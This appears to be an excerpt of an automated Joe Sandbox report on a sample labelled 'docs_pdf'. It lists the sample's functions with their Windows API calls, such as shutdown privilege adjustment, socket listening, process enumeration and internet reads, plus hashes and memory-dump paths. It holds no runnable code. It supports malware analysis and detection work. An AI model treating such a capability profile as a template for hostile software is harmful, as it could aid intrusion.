                                    • Opcode ID: 5c5ac30adcb5c21d6e94648a16bc5b9a7dbdf8bb10d199e8523dd2a659c48eef
                                    • Instruction ID: 56ad78147bce254785f3999ffcfbe6795bcf8bca0e98628849d5696dd06ca5d4
                                    • Opcode Fuzzy Hash: 5c5ac30adcb5c21d6e94648a16bc5b9a7dbdf8bb10d199e8523dd2a659c48eef
                                    • Instruction Fuzzy Hash: 0312BA70A0060ADFDF14DFA5CA82BEEB7B5FF48300F104169E446A7295EB3AAD51DB50
                                    APIs
                                      • Part of subcall function 01008CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                      • Part of subcall function 01008CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                      • Part of subcall function 01008CC3: GetLastError.KERNEL32 ref: 01008D47
                                    • ExitWindowsEx.USER32(?,00000000), ref: 0101549B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: a04282702a0356fcd1c13e6d1911ee49cbadd81a3f00d6d9cc298655a38d798c
                                    • Instruction ID: fa44a47d110a1220e780014466e951bd09db2cc95f9164b088d1557d9d153bd4
                                    • Opcode Fuzzy Hash: a04282702a0356fcd1c13e6d1911ee49cbadd81a3f00d6d9cc298655a38d798c
                                    • Instruction Fuzzy Hash: 3F012831BD52126BF778527C9C4ABBA72A8AB82256F100461FDC7DA0CADEBD58004290
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010265EF
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010265FE
                                    • bind.WSOCK32(00000000,?,00000010), ref: 0102661A
                                    • listen.WSOCK32(00000000,00000005), ref: 01026629
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026643
                                    • closesocket.WSOCK32(00000000,00000000), ref: 01026657
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e4ab97e5d0a81549111f0960b4ea08a9c24e6b05442b03ee26e72c34797cf7ba
                                    • Instruction ID: 5ab0ccf03c9313dc42cb1375d5bd69d5b8ebe2fd05231646126696094f635fd2
                                    • Opcode Fuzzy Hash: e4ab97e5d0a81549111f0960b4ea08a9c24e6b05442b03ee26e72c34797cf7ba
                                    • Instruction Fuzzy Hash: 6921D230600221AFDB20EF68C849F6EB7E9EF49320F148159E996E73D1CB75AD00DB51
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • _memmove.LIBCMT ref: 0100062F
                                    • _memmove.LIBCMT ref: 01000744
                                    • _memmove.LIBCMT ref: 010007EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 1300846289-0
                                    • Opcode ID: 04bbf0c926fddecd9c9ea41050c51dda505f57a93ae69978c27f4c833dcf8086
                                    • Instruction ID: 23c41f24c6431f2a074a1d678a98b8009761bde616d8911105d7b51ef81cf1f1
                                    • Opcode Fuzzy Hash: 04bbf0c926fddecd9c9ea41050c51dda505f57a93ae69978c27f4c833dcf8086
                                    • Instruction Fuzzy Hash: 9D02B1B0E00209DBDF05DF64D982BAE7BB5FF84340F148069E846DB295EB35DA50DB91
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FB19FA
                                    • GetSysColor.USER32(0000000F), ref: 00FB1A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00FB1A61
                                      • Part of subcall function 00FB1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FB12D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ColorProc$LongWindow
                                    • String ID:
                                    • API String ID: 3744519093-0
                                    • Opcode ID: fe9e6d0e8edf1fa33dc295d88529eb48fc71d30ae01a2ee86f389f1ef3df4c9f
                                    • Instruction ID: 5f88b6cc194039b60144fe28f24582b23413f1d1fbe6aec915398c2582e9a5c6
                                    • Opcode Fuzzy Hash: fe9e6d0e8edf1fa33dc295d88529eb48fc71d30ae01a2ee86f389f1ef3df4c9f
                                    • Instruction Fuzzy Hash: 61A180729054C6BAE6386A2B4C78EFF365DFB81361FA4011AF442E6185CE1DAD01FB71
                                    APIs
                                      • Part of subcall function 010280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01026AB1
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026ADA
                                    • bind.WSOCK32(00000000,?,00000010), ref: 01026B13
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026B20
                                    • closesocket.WSOCK32(00000000,00000000), ref: 01026B34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: e2d3fac8244ca81789114eed0518417687388d0198e42a5dc49b10036e89ff11
                                    • Instruction ID: 685cceb06fe425898ce672de757097719ebd768a818b2dfe4d359aef3c00e186
                                    • Opcode Fuzzy Hash: e2d3fac8244ca81789114eed0518417687388d0198e42a5dc49b10036e89ff11
                                    • Instruction Fuzzy Hash: DC41E675B00210AFEB10BF65DC86FAE77E9DB44710F008058FA4AAB3C2CA799D019B91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: dc8ae5f8b8709b277860ad7501d5df94393b5b153ef5c1dd45cd6d9895834b97
                                    • Instruction ID: a3563f135c1b5b4c691bcb64efa4f74c2f2853dfedd41a480a1a67b058776623
                                    • Opcode Fuzzy Hash: dc8ae5f8b8709b277860ad7501d5df94393b5b153ef5c1dd45cd6d9895834b97
                                    • Instruction Fuzzy Hash: 9611C1317006126FE7212F2BEC44A6FBBDDEF89721F004429F986D7251CB79D901EAA5
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0101C69D
                                    • CoCreateInstance.OLE32(01042D6C,00000000,00000001,01042BDC,?), ref: 0101C6B5
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • CoUninitialize.OLE32 ref: 0101C922
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                    • String ID: .lnk
                                    • API String ID: 2683427295-24824748
                                    • Opcode ID: aca788152bc439c467143c4a313348513f039f01971d119fe81432d9d5acc26c
                                    • Instruction ID: c8f937c203348c769467d09f1254e3cfa2fd259c39cec2238e6f9c9ec3c1c7b1
                                    • Opcode Fuzzy Hash: aca788152bc439c467143c4a313348513f039f01971d119fe81432d9d5acc26c
                                    • Instruction Fuzzy Hash: FEA13B71108205AFD300EF65CC81EABB7ECEF95704F04495CF2969B1A1DBB5EA49CB92
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF1D88,?), ref: 0102C312
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0102C324
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: b0a56f9500466e59b059daf9c4e3c22b17c30355a2c2f485043ef9eda9d29df0
                                    • Instruction ID: 5384ca34b125f9c146051f257b62fe73254d541298af24c1a6c6118ccfd252d3
                                    • Opcode Fuzzy Hash: b0a56f9500466e59b059daf9c4e3c22b17c30355a2c2f485043ef9eda9d29df0
                                    • Instruction Fuzzy Hash: CEE0C2B0A00323CFEB304F2ED414A4A7ADCEF09204B80C86EE8C5C6210E774D840CBA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: 99893e033ba9bc57d6306bb2df8221c9bda8627411aa52d47a2fb755a6ff4ce3
                                    • Instruction ID: 723f0765ba54f69ab18113be5281c898be9105ab2c3437437c5a4426c0af97d6
                                    • Opcode Fuzzy Hash: 99893e033ba9bc57d6306bb2df8221c9bda8627411aa52d47a2fb755a6ff4ce3
                                    • Instruction Fuzzy Hash: 7722BC716083029FC724EF24C982FAFB7E5AF84710F14891DF58697291DB75EA04EB92
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0102F151
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0102F15F
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0102F21F
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0102F22E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 72717d1e7fd720f3f2dbc7e3256cebecaabe2c532377606732bd278a76fa1119
                                    • Instruction ID: e98b60016294166f2bf1487a6be6196dddd30ebaa512b4e9d588a1408701a5d8
                                    • Opcode Fuzzy Hash: 72717d1e7fd720f3f2dbc7e3256cebecaabe2c532377606732bd278a76fa1119
                                    • Instruction Fuzzy Hash: 93519C71508311AFD320EF25DC81EABBBECEF85750F10491DF59597291EB74A908CB92
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0100EB19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 90c38acdb2673f49c70b344e7eefb237245ae05b75980062111930c8d845c321
                                    • Instruction ID: 2fb3dc13b2fb4769089b54673f19b2e1a9e722b70a87bc573445516254d357ce
                                    • Opcode Fuzzy Hash: 90c38acdb2673f49c70b344e7eefb237245ae05b75980062111930c8d845c321
                                    • Instruction Fuzzy Hash: 15323675A006059FE729CF19C480A6AB7F1FF48310F15C9AEE59ADB3A1DB70E941CB40
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 010226D5
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0102270C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 676aca489973dce0583dab846d74e7de92226458de6b6739a70b3d9350c597ea
                                    • Instruction ID: 8a00c22d9d4ebd53e5f2484d469bafa44855f06ea7e1e31d6fc09e2f71ef6f05
                                    • Opcode Fuzzy Hash: 676aca489973dce0583dab846d74e7de92226458de6b6739a70b3d9350c597ea
                                    • Instruction Fuzzy Hash: 0441E772504219BFEB21DED8DC89EBFB7FCFB44714F00409AF681A6240DB719E419650
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101B5AE
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0101B608
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0101B655
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: bfd49932f0c7bbbced9331e710cef0646d7f87db5ed381fa52fca0cf5213f2b8
                                    • Instruction ID: add7695b3addacc9bfd52b2e4700287116149dcedbf4e0eeca879c01450751e0
                                    • Opcode Fuzzy Hash: bfd49932f0c7bbbced9331e710cef0646d7f87db5ed381fa52fca0cf5213f2b8
                                    • Instruction Fuzzy Hash: F5214A75A00118EFCB00EFA5D880AEDBBB8FF49310F0480A9E945AB355DB39A915DF51
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                    • GetLastError.KERNEL32 ref: 01008D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: f48de40d1888dd160efba4c6c9091df956c3c01828ce274681b2f384498f7dd8
                                    • Instruction ID: 3ae808479de6faad1904e4a62d26a626bd99fc6fadacc129f6214576ba291529
                                    • Opcode Fuzzy Hash: f48de40d1888dd160efba4c6c9091df956c3c01828ce274681b2f384498f7dd8
                                    • Instruction Fuzzy Hash: EE1182B1914209AFE728AF58EC85D6BBBFDFB44710B24C62FF49593241DB35A8408B60
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101404B
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 01014088
                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 01014091
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: bbffa8d2aa90a9a7335d3aa54ad6e3e2102b1d344eb2192a55a508f5aff18705
                                    • Instruction ID: 504003c04301ad50ff8e00fe0f8e21a1900af98194f2a63421ec9681d90efe97
                                    • Opcode Fuzzy Hash: bbffa8d2aa90a9a7335d3aa54ad6e3e2102b1d344eb2192a55a508f5aff18705
                                    • Instruction Fuzzy Hash: F811CEB1D00229BEE7219AEDDC04FBFBBBCEB09710F000656BA44E7191C3B8590487A1
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01014C2C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01014C43
                                    • FreeSid.ADVAPI32(?), ref: 01014C53
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 96c47708eb1fa5443ab5a6137a9148b0b8c9712000c1f80f9a04d0e17a62561d
                                    • Instruction ID: 9758cf3e2e410348789ea9ea766440b2e93fb8c5fc9fc3d4f7b91b713e0704bf
                                    • Opcode Fuzzy Hash: 96c47708eb1fa5443ab5a6137a9148b0b8c9712000c1f80f9a04d0e17a62561d
                                    • Instruction Fuzzy Hash: C3F04975E1130DBFDF04DFF4D989AAEBBBCEF08201F0044A9AA05E2180E7756A048B51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2f8c967843fbe1518ea526aa98034081a3594d085ad59f6e9e356f6958749147
                                    • Instruction ID: 72cfdc2e0234addd5a5a0a6ce3f7558ca3640728b29f5c09f853e24984fe4d87
                                    • Opcode Fuzzy Hash: 2f8c967843fbe1518ea526aa98034081a3594d085ad59f6e9e356f6958749147
                                    • Instruction Fuzzy Hash: D9228C75E00219DFCB24DF59C880AEABBF1FF04310F288169E956AB351D734A985EF91
                                    APIs
                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 01014F55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID: DOWN
                                    • API String ID: 2434400541-711622031
                                    • Opcode ID: 4b2d2f2fce24b75143d492cfb1f4d0553fcf3b012ec70e075d7550327a59d730
                                    • Instruction ID: e125e4c74cdbd37bac0b6fd6c5576df3df1cdb0310279ba15b66b71958a73c4d
                                    • Opcode Fuzzy Hash: 4b2d2f2fce24b75143d492cfb1f4d0553fcf3b012ec70e075d7550327a59d730
